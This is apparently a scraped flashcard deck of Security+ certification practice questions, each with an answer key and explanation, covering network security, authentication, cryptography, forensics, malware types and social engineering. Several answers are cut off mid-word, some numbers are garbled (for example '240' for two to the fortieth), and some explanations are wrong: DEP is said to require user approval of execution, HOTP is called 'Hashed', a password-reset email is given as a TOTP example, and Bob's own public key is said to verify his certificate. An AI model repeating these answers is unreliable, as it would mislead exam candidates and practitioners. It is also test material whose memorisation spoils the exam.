80 Only port 80 should be opened on the Internet side of the demilitarized zone (DMZ) firewall. The firewall will allow only HTTP traffic to enter the DMZ; all other port traffic will be prevented from entering the DMZ. Answers A, B, and C are incorrect. Port 20 is used by File Transfer Protocol (FTP) to send data. Port 110 is used by Post Office Protocol (POP), and port 443 is used by Secure Sockets Layer (SSL). The Web server on the DMZ only serves Web pages, so only HTTP services should be activated on the Web server. All other services on the Web server should be deactivated, which will strengthen security on the Web server.Access control lists (ACLs) are used to configure rules on network devices. These ACLs determine which communication is allowed or denied. ACLs can be based on port numbers, IP addresses, MAC addresses, and other criteria.

Your organization has several conference rooms with wired RJ45 jacks that are used by employees and guests. The employees need to access internal organizational resources, but the guests only need to access the Internet. Which of the following should you implement?

802.1X and VLANs In this question the RJ45 wired jacks are the key. You don't want just anyone connecting to the wired jacks and having access to internal resources. So, implementing 802.1X and VLANs is an excellent solution. This will authenticate computers; only systems with the proper 802.1X adapter will be authenticated to internal resources. Other computers that connect will only be able to connect to the Internet. The virtual LAN can be port-based, with a VLAN per conference room, or perhaps protocol-based, defining which computers are allowed to internal resources and which are allowed to the Internet only. A virtual private network (VPN) is used so that remote users can gain access to the network. The scenario speaks only to localized conference rooms and resources, so a VPN (and the supporting IPsec used in L2TP connections) is not necessary. The organization will most likely have at least one switch and firewall already. However, the switch can be used as the authenticator of the 802.1X system. NAT (network address translation) is used in IPv4 networks to mask internal IP addresses when they access the Internet. This will most likely already be implemented by default, so any guests accessing the Internet will enjoy the security benefits of NAT. However, a demilitarized zone (DMZ) has little to do with the scenario; this is when servers (such as WWW and FTP) are placed in an area outside the LAN but still within the organization's network, making it easier for people on the Internet to access them.

You have been instructed to install an intrusion detection system that can protect a database server and the rest of the network. You cannot afford to use any more resources on the database server. You decide to implement a network intrusion detection system. Why is this superior to a host-based intrusion detection system?

A HIDS can negatively impact system performance. Usually, a HIDS cannot detect network attacks. A HIDS usually cannot detect network attacks, whereas a NIDS can. A HIDS will definitely have a negative impact on system performance because it uses resources in the form of CPU and RAM; however, a HIDS is reliable when it comes to detecting attacks on an individual computer. Also, a HIDS can be update

Which of the following is embedded and contains a storage root key?

A TPM (trusted platform module) is a dedicated chip residing on the motherboard that stores encrypted keys. One of these is the storage root key. This is used to encrypt the contents of the entire hard drive and is used by programs such as BitLocker for full disk encryption.An HSM (hardware security module) is a separate physical device that manages digital keys. It is not embedded in the system, but is external to the computer. EFS (Encrypting File System) is Microsoft's system for encrypting individual files in Windows, at which point their filenames turn green when viewed in Windows Explorer or File Explorer. BitLocker is Microsoft's full disk encryption program in Windows, which can make use of a TPM.

You are the security administrator for an organization. Management decides that all communications on the network should be encrypted using the data encryption standard (DES) or Triple DES (3DES) algorithm. Which statement is true of these algorithms?

A Triple DES (3DES) algorithm uses 48 rounds of computation. A Triple DES (3DES) algorithm uses 48 rounds of computation. It offers high resistance to differential cryptanalysis because it uses so many rounds. The encryption and decryption process performed by 3DES takes longer due to the higher processing power required. The actual key size of the Data Encryption Standard (DES) is 64 bits. A key size of 8 bits is used for a parity check. Therefore, the effective key size of DES is 56 bits. The DES algorithm uses 16 rounds of computation. The order and the type of computations performed depend upon the value supplied to the algorithm through the cipher blocks. According to the following calculation, a 56-bit DES encryption is 65,536 times more secure than a 40-bit DES encryption: 240 = 1099511627776 and 256 = 72057594037927936Therefore, 72057594037927936 divided by 1099511627776 = 65,536.DES has many security issues. If a bank has a fleet of aging payment terminals used by merchants for transactional processing, and the terminals currently support single DES but require an upgrade to be compliant with security standards, the simplest solution to improve the in-transit protection of transactional data is to upgrade to 3DES.

During a forensic investigation, you are asked to make a copy of the contents of a hard drive. You need to ensure that this evidence can be used in court if needed. Which statement is true of disk imaging in this investigation?

A bit-level copy of the disk assists in the forensic investigation. A bit-level copy of the original disk proves helpful in the forensic investigation. A bit-level copy of a hard disk refers to making a copy at the sector level to cover every part of the area that can store user data, such as slack space and free space. When creating a copy of the original disk, you should also perform a forensic hashing of the disk contents, both before and after the copy is made. In addition, a forensic hashing of the image itself should be performed. By doing so, you can ensure that image remains intact by comparing the hash values that are generated.A byte-level copy of the hard disk is not preferred for forensic analysis after an incident has occurred. A byte-level copy initiates the forensic imaging of the attacked workstation.To ensure the integrity of the evidence, the forensic investigation is not performed on the actual system. The system is taken offline by disconnecting it from the network, dumping the contents of the memory, and powering down the system. A backup copy of the system is taken, and this backup copy is used for investigation purposes. The output from the forensic imaging software should be directed towards a small computer system interface (SCSI) drive or some other media that is external to the system being investigated. This is done to initiate the forensic imaging of the attacked workstation. Changes made to the system, such as changing the file timestamps and modifying the files, can destroy the evidence. Therefore, skilled personnel should perform the forensic investigation to ensure that the evidence is unharmed and uncorrupted.

The new anti-virus application that your company purchased claims that it protects against all types of viruses, including multipart viruses. Which statement correctly defines this type of virus?

A multipart virus can infect executable files and boot sectors of hard disk drives. A multipart virus can infect both executable files and boot sectors of hard disk drives. The multipart virus resides in the memory and then infects boot sectors and executable files of the computer system. Answer B is incorrect. Macro viruses are programs written in Word Basic, Visual Basic, and VBScript. Macro viruses pose a major threat because the simplicity of the underlying language makes them easy to develop. They are platform independent and typically infect systems through Microsoft Office products. Answer A is incorrect. A stealth virus hides the changes it makes to system files and boot records, making it difficult to detect its presence. A stealth virus maintains a copy of a file before infecting it and presents the original copy to the monitoring software so that no changes are detected by the system. Answer D is incorrect. A self-garbling virus can hide itself from antivirus software by distorting its own code. When a self-garbling virus spreads, it jumbles and garbles its own code to prevent the antivirus software from detecting its presence. A small part of the virus code later decodes the jumbled part to obtain and subsequently execute the rest of the virus code. The ability of the self-garbling virus to format its own code makes it difficult for an antivirus to detect its presence. At some point during the patch application process, a file may become infected with a virus. When this is discovered, you will need to recover the file by replacing the exi

STP

A networking protocol that automatically creates a loop-free topology of Ethernet switches. Prevents looping that can occur when connecting both ends of a patch cable to ports on one switch.

nonce

A random number issued by an authentication protocol that can only be used once.

Which of the following is a disadvantage of PGP?

A recipient must trust a public key that is received.

You have a mobile sales force that must regularly access customer records from remote sites. You are concerned about security in the event a laptop or tablet is stolen. You want to implement measures that would not only include user authentication via username and password, but also evaluate other factors, such as time of day and location. What should you implement?

ABAC Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. It would also control behavior based on location, such as if a user has read access to files, but is attempting to edit or delete files remotely. Answer D is incorrect. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is with range of the proximity card, and the information transmitted is correct, authentication is granted. Answer A is incorrect. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once the card is stolen, the thief can use it in the same manner as the rightful owner. For example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Answer B is incorrect. False acceptance rate (FAR) is one way to measure the accuracy of a biometric authentication system. It measures how likely it would be that an unauthorized user is granted access to the system. Expressed as a ratio, it is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. A false acceptance can occur, for example, when an unauthorized individual with a dirty finger uses a fingerprint reader, and is allowed access to the system. This could happen because the system was not precise enough when matching the authorized user. By contrast, false rejection rate (FRR) measures how likely it would be that an authorized user is denied access to the system. It is also expressed as a ratio, calculated as the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures.Other considerations include CER, tokens, HOTP, TOTP, CAC, PIV, and file system security. Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value would indicate a more accurate system. CER is primarily used to compare biometric authentication systems. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. HOTP and TOTP are two types of one-time passwords, i.e., they can only be used once. Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once it is used or its time expires, the TOTP is no longer valid. As an example of a TOTP, a user forgets a password to a website. When the user clicks the "Forgot Password" link, the website would send a new temporary password to the user, but would limit how long the temporary password would be valid. A Common Access Card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. A Personal Identity Verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login.File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

What needs to be configured to offer remote access to a network?

ACL's Access control lists (ACLs) need to be configured properly for users to gain remote access through a firewall/router and proceed to the main network. Tokens are used in authentication schemes (often local) but are usually generated with little configuration. Biometrics is the authentication of individuals through physical characteristics. Supplicants (authentication agents) are usually loaded on computers in an 802.1X NAC network, which is usually local and with little configuration.

Your employees are allowed to use personal fitness monitors and other wearable devices inside your facility. You are concerned about proprietary communication with these devices. Which of these technologies is the wireless communication with which you should be concerned?

ANT You should be concerned with ANT, which is a proprietary technology developed by Garmin. It is mostly used in wearable devices, like fitness sensors. It is a low-power wireless technology with a range of about 30 meters. ANT is susceptible to eavesdropping, interception, and impersonation.Answer A is incorrect. Near field communications (NFC) connects devices automatically when they are in range. NFC is often used with mobile payment systems on smartphones. Security issues arise if someone loses a phone, if the phone is stolen, or if the phone is compromised in some other. One example would be if the user's swipe pattern is ascertained. NFC is an ISO/IEC standard, not a proprietary technology.Answer B is incorrect. Bluetooth devices are a long-standing security concern because they are susceptible to bluejacking (sending unsolicited messages) and bluesnarfing (extracting data from the device). A new attack called BlueBorne can download viruses and malware to Bluetooth-enabled devices. Bluetooth is a wireless standard from the Bluetooth Special Interest Good (SIG), not a proprietary technology.Answer C is incorrect. Infrared requires line-of-sight communication. While it is still used in some TV remote controls, it has largely been replaced by Bluetooth and WiFi. Infrared is a standard from ANSI and other organizations, not a proprietary technology.Other mobile device security concerns include DoS, WiFi, SATCOM, and USB.Cellular security solutions continue to improve, but DoS remains a vulnerability concern. WiFi has several security options. They include WEP, WPA, and WPA2. WEP has serious flaws, is easy to crack, and is not recommended. WPA2 is the most secure, and should always be your first choice. Satellite communication (SATCOM) over a satellite phone is insecure. An attacker can bypass your network and connect to a satellite. Data interception, injection attacks, and data manipulation are particular concerns. USB, from a wireless standpoint, is incorporated into many portable devices with storage capability. Vulnerabilities include packet loss and data corruption.

Your company implements Kerberos 5 to provide authentication services. Which entity in this deployment authenticates users?

AS In Kerberos 5, Authentication Service (AS) Exchange authenticates users and provides users with a ticket-granting ticket (TGT). When a user wants to gain access to a network resource, that user's TGT is sent to a computer that provides Kerberos Ticket Granting Service (TGS) Exchange. A TGS server uses a TGT to create a session key for the client requesting service and the server providing service. A client requesting service sends a session key to a server, and Client-Server (CS) exchange is used to enable a client and a server to authenticate one another. After these processes are completed, a client can gain access to services on a server. AS, CS, and TGS are the three main protocols used on a Kerberos network to provide authentication and authorization for use of resources.

Which of the following refers to the amount of time that users will not be allowed to attempt to log in to the network after they have reached the threshold of account login failures?

Account lockout duration The account lockout duration is the amount of time that users will not be allowed to attempt to log in to the network after they have reached the threshold of account login failures. By default, this setting is 30 minutes on many security policies.The account lockout threshold is the number of times that the user is allowed to attempt to log in. The default on many policies is five attempts, but often organizations change this to three (known as the three-strikes-and-you're-out rule). Password complexity requirements can be enabled within a policy; if so, the users need to incorporate three of four methods of password complexity, including uppercase characters, numeric characters, special characters, and so on. Minimum password age is the number of days that a password must exist before a user is allowed to change it.

You have been tasked with blocking DNS requests and zone transfers coming from outside IP addresses. You analyze your organization's firewall and note that it implements an implicit allow and currently has the following ACL configured for the external interface: permit TCP any any 80permit TCP any any 443

Add the following ACL at the bottom of the current ACL:deny IP any any 53 Change the implicit rule to an implicit deny First of all, a firewall should not be set with an implicit allow by default. That would allow just about any kind of traffic through the firewall. Plus, it would make the already configured ACL unnecessary. So, the firewall should be changed to an implicit deny for all connections. That is the default settings for firewalls and it disallows all traffic coming from the Internet through the inbound interface (unless otherwise stated with an ACL). Second, you would add the ACL deny IP any any 53 at the bottom of the current ACL. This will deny any DNS traffic (because DNS uses port 53) including DNS requests and zone transfers. It does this for any type of IP connection (including TCP and UDP) and for all IP addresses on the local and remote ends. Removing the current ACL would do nothing because the firewall is currently configured with an implicit allow. However, if you changed that default rule to an implicit deny and removed the ACL, Internet users would no longer be able to connect to the web server (which uses ports 80 and 443). That doesn't solve your problem; in fact, it creates another one. It doesn't really matter where you place the new ACL to block DNS requests—top, bottom, doesn't make a difference because when you are finished, the firewall will have an implicit deny, and then two separate ACLs that pretty much work independently of each other. However, you would normally place the ACLs in order, and this would mean placing the new ACL below the first. The key with the other two possible ACLs in the answers is that they are not blocking enough traffic. One shows TCP, which is not enough; you need to block TCP and UDP—this is done by simply stating IP. ICMP is not correct, because that deals with layer 3 testing, such as the ping utility.

You are incorporating a perimeter network into a network redesign and are adding several new devices to enhance security. Which of these would NOT be best placed in the new perimeter network?

Aggregation switches Aggregation switches are not best placed in a perimeter network because they are best used to connect other switches together. They can be placed anywhere they are needed. Aggregation switches create a single bandwidth stream from multiple sources. Answer D is incorrect. A DDoS mitigator should be placed in the perimeter network so that it can detect and mitigate a DDoS attack.Answer A is incorrect. Proxies are best suited for placement in the perimeter network.Answer B is incorrect. VPN concentrators should be place in the perimeter network near the gateway. Other security devices and technologies that are sensitive to their placement include sensors, collectors, correlation engines, load balancers, VPN concentrators, SSL accelerators, taps, and SDN. Sensors, collectors, and correlation engines should be placed closest to the devices being monitored to improve performance. Load balancers are usually placed in the same networks as devices that receive a high load. VPN concentrators should be placed on the VPN perimeter. SSL accelerators should be placed close to or on the devices using SSL. Taps should be placed closest to the devices they are monitoring. SDN can be used anywhere, but the SDN controller should be centrally located to provide the best performance for all devices that communicate via the SDN.Sensors are a classification of security devices that collect information on a host or on the network. Based on the information received, they may produce an alert or react with a trigger. Collectors are a classification of security device that gather information from various sources. The information is then delivered to a correlation engine.Correlation engines examine logs from several firewalls, and aggregate the entries to determine attack patterns. As long as the firewall is accessible from the correlation engine, it is not necessary that the correlation engine be placed in close proximity to the firewall. Because of the information collected by correlation engines, you should ensure that the appropriate security controls are deployed to protect the engine.SSL accelerators assist the processor-intensive activities associated with SSL/TLS encryption.Load balancers would be placed based on where they are needed. If it needs to balance the load among several web servers, the load balancer would be placed in the DMZ. If, however, there is high traffic associated with internal file servers, the load balancer would be better placed in the same network segment as the file servers. Taps (monitoring ports) and port mirrors allow an IDS to examine network traffic. They should be placed in the appropriate network segment. VPN concentrators should be placed in the perimeter network near the gateway. SDN is a Software Defined Network and virtualizes the entire network, including the security devices.

How can you keep the production network safe from vulnerabilities that may be caused by a failed test in the R&D department?

Air gap Sandboxing Airgapping (or air gapping) in network security means that you physically separate secure networks and equipment from insecure networks and equipment. For example, you would not want to have your development or R&D platforms on the same network as your production equipment. Data cannot move between air gapped and insecure systems unless it is physically transferred on media, like a disk or USB stick. Air gapping is an important security concept for IoT devices as well.Sandboxing is developing an application outside of the production environment. Sandboxing can also be useful to test a legacy operating system that may not have security patches. Virtual machines are often used to create the sandbox. Memory allocation issues may be discovered during sandbox testing, but are not directly a part of the sandbox functionality.Answer B is incorrect. A Faraday cage is a security measure that protects against eavesdropping or signals leaving the room. The "cage" is wire mesh or other conductive material woven together to protect the room. Answer A is incorrect. Tokens and cards include items that a user must possess in order to gain access to the building, room, or network resource. They include one-time password that authenticates the user and smart cards. They are an integral part of authentication, but do not provide internetwork protection.

Alice wishes to send a file to Bob using a PKI. Which of the following types of keys should Alice use to sign the file?

Alice's private key Alice should use her own private key to sign the file. Refer to Table 14-4 in the book. It shows that to send an encrypted signature, Alice (the sender) would need her own private key. To decrypt the signature, Bob (the recipient) would need Alice's (the sender's) public key. In this scenario, Bob's keys don't even come into play because he is the receiver. However, in a scenario where Alice had sent Bob an encrypted message, Bob's public and private keys would be utilized for the encrypting and decrypting of the message, respectively.

You need to install a network-based intrusion detection system (NIDS) for your company. Which statement is NOT a characteristic of this device?

An NIDS analyzes encrypted information. The primary disadvantage of an NIDS is its inability to analyze encrypted information. For example, the packets that traverse through a Virtual Private Network (VPN) tunnel cannot be analyzed by the NIDS. An NIDS would most likely be used to detect, but not react to, behavior on the network.Answer C is incorrect. An NIDS monitors real-time traffic over the network, captures the packets, and analyzes them either through a signature database or against the normal traffic pattern behavior to ensure that there are no intrusion attempts or malicious threats. NIDS finds extensive commercial implementation in most organizations. An NIDS can help identify smurf attacks.Answer D is incorrect. An NIDS can monitor either a complete network or some portions of a segregated network. It remains passive while acquiring the network data. For example, an intrusion detection system (IDS) can monitor real-time traffic on the internal network or a de-militarized zone (DMZ). In a DMZ, public servers, such as e-mail, DNS, and FTP servers, are hosted by an organization to segregate these public servers from the internal network. Answer A is incorrect. An NIDS does not monitor specific workstations. A host-based IDS (HIDS) monitors individual workstations on a network. An intrusion detection agent should be installed on each individual workstation of a network segment to monitor any security breach attempt on a host.

You have set up an auditing system for the servers on your network. Which three statements regarding an audit trail are NOT true?

An audit trail does not record successful login attempts. An audit trail is a preventive control. An audit trail is reviewed only when an intrusion is detected. An audit trail is not a preventive control. It is a detective control that maintains a sequential record of the system activities and the system resource usage. An audit trail records a lot of useful information, such as successful and unsuccessful login attempts, user identification, password usage, and resources accessed by a user over a span of time. Audit trails can also provide information about events related to the operating system and the application. Audit trail records are usually reviewed before an intrusion has been detected and contained. Before the affected system is reinstalled and production restarted, audit trail records enable you to track the source of the intrusion, understand the type of attack, and identify any loophole that can result in a potential security breach in the future.The main purpose of audit logs and trails is to establish individual accountability and responsibility.Access to audit logs and trails should be tightly controlled. In addition, the data recorded in an audit log must be strictly controlled. Separation of duties must be enforced to ensure that personnel who administer the access control function and personnel who administer the audit trail are two different people. A security administrator should periodically review audit trails to detect any suspicious activity or a performance bottleneck in the infrastructure resources. An administrator can select certain critical events and log them for review. The administrator can later use the events for analysis.Instead of manually reviewing a large amount of audit trail data, applications and audit trail analysis tools can be used to reduce the volume of audit logs and to improve the efficiency of the review process. Such analysis tools can be used to provide information about specific events in a useful format and in sufficient details.For the Security+ exam, you need to understand permission auditing and review and usage auditing and review. Permission auditing and review ensures that users have the appropriate permissions to complete the tasks that are part of their job. By implementing permission auditing and review, you ensure that privilege creep does not occur. Usage auditing and review ensures that accounts are still being used. By implementing usage auditing and review, you ensure that accounts that are no longer in use are disabled.

Your company has decided to deploy a new wireless network at a branch office. This branch office is located in a busy commercial district. Management has asked you to fully assess the external vulnerabilities of the wireless network before it is deployed. Which three conditions should you assess?

Antenna type Antenna placement Access point power Antenna type (such as the use of directional versus omnidirectional antennas) plays an important role in protecting a wireless network. Using a directional antenna can limit the area that is covered by the antenna. Antenna placement will also have an effect on the vulnerabilities of a wireless system. Antennas should be placed as far away from exterior walls as possible. Otherwise, the signal will go outside the building. This allows anyone outside the building to attach to your network. That is why RADIUS and other technologies are required for wireless networks. The power of the access points should be adjusted to a level that is just strong enough for the operation of the network, but not so strong that signals escape to the outside of the building. You should reduce power levels for better security to ensure that the signal does not extend beyond its needed range.Answers F and D are incorrect. The number of users and the speed of the connection will not cause external vulnerabilities to a wireless system. The number of user addresses is, however, a cause of external vulnerabilities.Answer E is incorrect. Captive portals are a type of wireless access point that only permits Internet access to authenticated users. While an organization may want to deploy this solution, it is not necessary to assess this as an external vulnerability. You should ensure that any wireless network that you deploy is properly protected from unauthorized users. Usually this just involves deploying the network using the WPA or WPA2 protocol. If you use WEP, unauthorized users can easily gain access to your network.You should also be careful as to which internal resources are connected to the wireless network without deploying the appropriate security hardware, such as a firewall.Some wireless access points will allow you to select the wireless band frequency. This band selection feature usually uses either the 2.4 or 5.0 GHz frequency. The bandwidth speed will vary, depending on which 802.11 standard is used. 802.11a is capable of up to 54 Mbps. 802.11b is capable of up to 11 Mbps. 802.11g is capable of up to 54 Mbps. 802.11n is capable of up to 300 Mbps. But remember that bandwidth is shared by all the devices connected.

You suspect that several users are attempting to install unauthorized software. Upon researching, you discover that the attempts were unsuccessful. What tool did you implement that logged those attempts and identified the users?

Application whitelisting Application whitelisting is the practice of denying all applications except for those that are approved. Those approved applications are designated as whitelisted. Several products are available that check for applications that are not on the whitelist, including attempts to install those applications. For example, the logs generated by the whitelisting product would tell you if someone had attempted to install a keylogger. Answer B is incorrect. Removable media control (RMC) is important in many environments. USB drives, SD cards, CDs, DVDs, and BluRay devices can all present dangers to the system. As an example, someone can use a USB drive to copy sensitive information and deliver it to someone outside the organization. Another example could be a CD that is appears to be a music CD, but is actually installation media for unauthorized software. Examine the RMC logs to determine attempts to violate removable media policies.Answer C is incorrect. File integrity checks examine selected files to see if there have been any changes. Some file integrity checks just notify you of a change, while others can actually return a file to its previous state if the change is unauthorized. File integrity checks would not monitor attempts to install applications.Answer D is incorrect. Patch management tools assist with the installation of patches, which can present a significant challenge to an enterprise environment. Best practices dictate that you install a patch on a test machine and verify that the patch performs as expected prior to deploying it throughout the network. It is important to examine the logs to check for failed updates, incompatible patches, and unsuccessful patch installations. These tools would not monitor attempts to install applications.HIDSs and HIPSs have two different functions. Host-based Intrusion Detection Systems (HIDS) will provide an alert in the event of a breach on a single server or computer. Host-based Intrusion Prevention Systems (HIPS) will go a step further and stop the attack. An example of an HIPS in action would be shutting down port 80 when HTTP traffic exceeds the baseline norm. With either product, it would be important to view the log entries generated, and interpret the results based on documentation provided by the HIPS/HIDS vendor. These devices log inbound traffic, not necessarily internal attempts to install applications on a device.Antivirus products (and the antimalware products that encompass them) provide notifications when a threat has been detected, and what action was taken. On many occasions, the software will identify a potential threat and prompt you to choose an action to take. Antivirus products might scan an application that a user is attempting to install, but if the application is not actually malware, it will not notify an administrator or log the attempt.Host-based firewalls include products that are installed as an application, or included in the OS, such as the Windows Firewall. In the case of Windows Firewall, it is possible to have the firewall activated, but not generating log entries. You can activate logging by going into the console, choosing Actions, and then choosing Properties. You can customize the logging settings by clicking the Customize button in the Logging section on the Domain Profile tab. Firewalls monitor inbound traffic, not internal attempts to install applications.Advanced malware tools check for malicious code that would otherwise slip by standard antivirus and antimalware tools. Unified Threat Management (UTM) incorporates several threat management devices and systems into one appliance. The biggest advantage to a UTM, from analysis standpoint, is that all the logs are in one place, as opposed to checking multiple systems.Data Loss Prevention (DLP) examines outbound traffic for sensitive data, keywords, and specific files leaving the organization. It does not monitor internal attempts to install applications.Data execution prevention (DEP) forces the user to approve an application before it executes, or launches. Logs will record execution attempts, including failed attempts. Notification of failed attempts is important, as it could tell you that your antimalware application successfully blocked an attempt to install malware. Forcing a user to approve an execution will not prevent them from installing an unapproved application.A web application firewall (WAF) uses a set of defined rules to manage incoming and outgoing web server traffic, as well as attack prevention. Organizations can define their own rules based on their particular vulnerability. It would not monitor application installations.

Your organization is designing a database warehouse. Database administrators are trying to decide between implementing database-level, application-level, or warehouse-level security for the data warehouse. Which statements are TRUE?

Application-level security secures both the data and the functions of the application. Database-level security is best if more than one application is being used to access the data warehouse. Database-level security is best if there will be more than 100 users for the data warehouse. The security table will likely become the largest table within the warehouse. All of the options are correct. When deciding between implementing database-level, application-level, or warehouse-level security for a data warehouse, keep the following points in mind: Application-level security secures both the data and the functions of the application. Database-level security is best if: There will be more than 100 users for the data warehouse. More than one application is being used to access the data warehouse. The security table will likely become the largest table within the warehouse.

Which of the following is a type of malware that is difficult to reverse engineer?

Armored virus The armored virus protects itself from AV programs by tricking the program into thinking that it is located in a different place than where it actually resides. It thwarts attempts at analysis of its code. This makes it difficult to reverse engineer, and therefore makes building a defense against it difficult. A logic bomb is code that is inserted into software that "detonates" one of many types of malware when specific criteria are met. So, the logic bomb is more of a method of delivery for malware than the malware itself. The same holds true for backdoors; they are coded entrances to a system that either were designed for testing and forgotten about or are openings that were never found during a secure code review. A worm is similar to a virus except that it self-replicates. However, worms are fairly easy to detect and locate, making reverse engineering at least feasible.

The company who just hired you provides a fixed amount to new employees so that the employee can purchase the laptop of their choice. After the purchase, the employee only needs to submit the receipt. What should you implement so that the company is able to better track the laptops?

Asset management Asset management allows an organization to keep track of equipment and software. Laptops, tablets, servers, routers, and switches are among the assets that the company should track. Software asset management includes license control, version control, and knowing what software is installed on what equipment. Answer D is incorrect. Unauthorized software can include both pirated software and open source versions of otherwise "pricey" applications. For example, instead of purchasing the required Microsoft Office, someone may decide to use an unauthorized open source application like OpenOffice or LibreOffice. While using an open source software may not violate licensing issues, installing unauthorized software is a policy violation.Answer A is incorrect. Baseline deviations occur when a key metric of network operation is performing outside of its normal range. The normal range for a given metric is called a baseline. For example, assume that network traffic is normally 5Mbps on Monday morning at 8 AM. Upon inspection, you find that on a particular Monday at 8AM the network traffic was 120Mbps. This would indication you have a baseline deviation, and it would require further investigation to determine the source. While it could simply be attributed to remote employees working from the office, researching the cause is always important.Answer B is incorrect. License compliance violations (availability/integrity issues) arise when someone installs an unlicensed copy of an application or operating system. Such an installation is a violation of copyright law, and may result in severe financial implications for the organization.Authentication issues are associated with validating authentication credentials. Authentication issues can result if incorrect credentials are provided or if the authentication server is down. To troubleshoot such issues, technicians should attempt to log in using a different account. If the login is successful, then something is wrong with the user's credentials. If the login is not successful, then a communication issue is the problem, and you should troubleshoot the connection with the authentication server.

Which of the following is used when performing a quantitative risk analysis?

Asset value Asset value is an actual concrete piece of information that you can make risk-based decisions with in a quantitative manner. The other answers are vague at best and don't give solid details for your risk analysis; they might be better suited for qualitative risk analysis.

Your company has deployed an application that requires access to a user's Google account. What would OpenID Connect provide in this deployment?

Authentication of the user's Google account OpenID Connect provides the authentication necessary in OAuth 2.0. It authenticates the user and stores the user information in a secure token. A secure token contains the user information and authentication information used by OpenID.OAuth is Open Authorization. The current standard, OAuth 2.0, grants an application limited access to a user's account on a third-party site, such as Facebook or Twitter. OAuth could grant the application access to a friend's list or give the application the ability to post on the user's behalf. Shibboleth uses Security Assertion Markup Language (SAML), which defines security authorizations on web pages, as opposed to web page elements in HTML. Shibboleth is a single sign-on (SSO) system but does allow the usage of Facebook, Google, or Twitter credentials

Which of the following defines the main difference between identification and authentication?

Authentication verifies a set of credentials, whereas identification verifies the identity of a user requesting credentials.

Which of the following offer the best protection against brute-forcing passwords? (Select the two best answers.)

Bcrypt PBKDF2 Bcrypt and PBKDF2 are examples of key stretching software. This software takes a weaker password key and stretches the key length, in the end outputting an enhanced and more powerful key, usually to 128 bits in length. This makes brute-force attacks difficult if not impossible. Bcrypt also adds salting (additional data added to the password hash), which helps protect against dictionary attacks and rainbow table attacks. MD5 and SHA2 are cryptographic hashing protocols, used to verify the integrity of files. AES is a common symmetric encryption protocol used to encrypt files and session data. CHAP is an authentication scheme, one that could be used by a RADIUS server or other authentication system.

Which principle behind a social engineering attack relies on the victim's belief that the attacker is someone who can be trusted, based on the attacker's supposed job title or position?

Authority Authority attacks are particularly effective because they feed on the victim's assumption that the attacker is automatically someone to be trusted. That trust is based on the attacker's apparent position or title, either within or outside of the organization. Examples include "This is Keith Brown, the IT Director" or "This is FBI Special Agent Andrea Wilson."Answer D is incorrect. Intimidation attacks threaten the victim and making the victim feel guilty. The threats can be financial, job loss, physical threats, and threats of harming the victim's family.Answer A is incorrect. Familiarity attacks happen when the attacker gets the victim to "like" them. This can be done through membership in the same organizations, participation in the same types of activities, or exploiting a common interest. Answer B is incorrect. Trust attacks attempt to gain the victim's trust. In some cases, the victim feels the need to reciprocate after the attacker has done some good deed for the victim. This results in a situation where the victim trusts the attacker. Some examples of a good deed include helping the victim get out of a tight situation, paying for a meal, and taking the blame for something the victim was accused of. Other social engineering attack principles include consensus attacks, scarcity attacks, and urgency attacks.Consensus attacks deal with the attacker giving attention to the victim. When an attacker offers praise, flattery, encouragement, or validation of a victim's ideas, it often leads the victim to believe that the attacker is an ally as opposed to an enemy. Attackers can also create a sense of consensus by providing the victim with false testimonials or positive reviews that convince the victim other people approve of the attacker's link or malware. Scarcity attacks deal with supply and demand. By telling the victim that there is a limited supply ("Only 5 remaining at this special price"), the attacker can draw the victim to a phony website to complete the "purchase." At the website, the attacker collects the victim's information for further exploitation.Urgency attacks create the illusion that a time-sensitive issue must be acted upon right away. The attacker convinces the victim that failure to act will result in a financial or legal penalty, or some other unpleasant consequence.Reference: CompTIA Security+ Deluxe Study Guide: SY0-501. Chapter 10: Social Engineering and Other Foes, The Principles Behind Social Engineering Lesson: Social Engineering, User Education, and Facilities Security Objective: Social Engineering

You are in charge of your organization's backup plan. You need to make sure that the data backups are available in case of a disaster. However, you need to keep the plan as inexpensive as possible. Which of the following solutions should you implement?

Back up data to removable media and store a copy offsite Backing up data to removable media and storing it offsite is the least expensive solution. Hot sites and cold sites can cost the organization a lot of money, especially hot sites. Implementing a remote backup solution usually requires some sort of service with a monthly fee. You, as the network administrator, can back up data to removable media and store it offsite without incurring any other fees except for the cost of the removable media.

Bob wants to send an encrypted e-mail to Alice. Which of the following will Alice need to use to verify the validity of Bob's certificate? (Select the two best answers.)

Bob's public key The CA's public key The key word here is verify. If Alice is to verify the validity of Bob's certificate, she will need either Bob's public key or the CA's public key. Table 1 sums up the keys required for encrypting/decrypting data, signatures, and certificates. This table is based on RSA, but usually these rules of thumb hold true for any scenario where a public/private key pair are used. TaskWhich Person's Key to UseType of KeySend an encrypted messageReceiver'sPublic keyDecrypt an encrypted messageReceiver'sPrivate keySend an encrypted signatureSender'sPrivate keyDecrypt an encrypted signature or verify a certificateSender'sPublic key Table A: Summary of RSA Public and Private Key UsageAs you can see from the last row of the table, to decrypt an encrypted signature or verify a certificate, you would need the sender's public key; in this case, Bob's public key (or the CA's public key).Alice cannot use her own key to verify the certificate, and cannot use anyone else's private keys. She would have to use the public key of the sender, be it Bob's or the CA's. Table 1 shows that there are a variety of possibilities depending on the scenario, and depending on who is sending what. For example, if Bob sent an encrypted message to Alice, he would need to use her public key to encrypt the message, and Alice would need to use her private key to decrypt the message.

